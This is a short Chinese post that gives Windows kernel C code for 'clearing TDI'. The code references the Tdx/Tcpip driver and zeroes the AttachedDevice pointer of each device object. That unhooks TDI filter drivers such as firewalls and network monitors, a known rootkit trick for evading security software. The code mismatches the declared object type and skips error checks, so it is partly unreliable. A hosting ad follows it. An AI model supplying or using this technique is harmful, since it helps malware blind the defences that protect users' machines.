清除tdi的方法
#ifdef __cplusplus
extern "C"
{
#endif
#include <NTDDK.h>
NTKERNELAPI
NTSTATUS
ObReferenceObjectByName(
IN PUNICODE_STRING ObjectName,
IN ULONG Attributes,
IN PACCESS_STATE PassedAccessState OPTIONAL,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN POBJECT_TYPE ObjectType,
IN KPROCESSOR_MODE AccessMode,
IN OUT PVOID ParseContext OPTIONAL,
OUT PVOID *Object
);
extern POBJECT_TYPE* IoDriverObjectType;
#ifdef __cplusplus
}
#endif
PDEVICE_OBJECT DeviceObject = NULL;
PFILE_OBJECT FileObject = NULL;
PDRIVER_OBJECT pDriver = NULL;
UNICODE_STRING DeviceName;
RtlInitUnicodeString( &DeviceName, L"\\Driver\\Tdx" );//win7下
//RtlInitUnicodeString( &DeviceName, L"\\Driver\\Tcpip" );//xp下
ObReferenceObjectByName(&DeviceName,OBJ_CASE_INSENSITIVE,NULL,FILE_ALL_ACCESS,IoDeviceObjectType,KernelMode,NULL,(PVOID*)&pDriver);
DeviceObject = pDriver->DeviceObject;
while(DeviceObject!= NULL )
{
DeviceObject->AttachedDevice=0;
DeviceObject = DeviceObject->NextDevice;
}
ObDereferenceObject(pDriver);
虽说简单但是已经教授很多人了,就像TDI过滤驱动修改数据包一样简单。
阿里云助力开发者!2核2G 3M带宽不限流量!6.18限时价,开
发者可享99元/年,续费同价!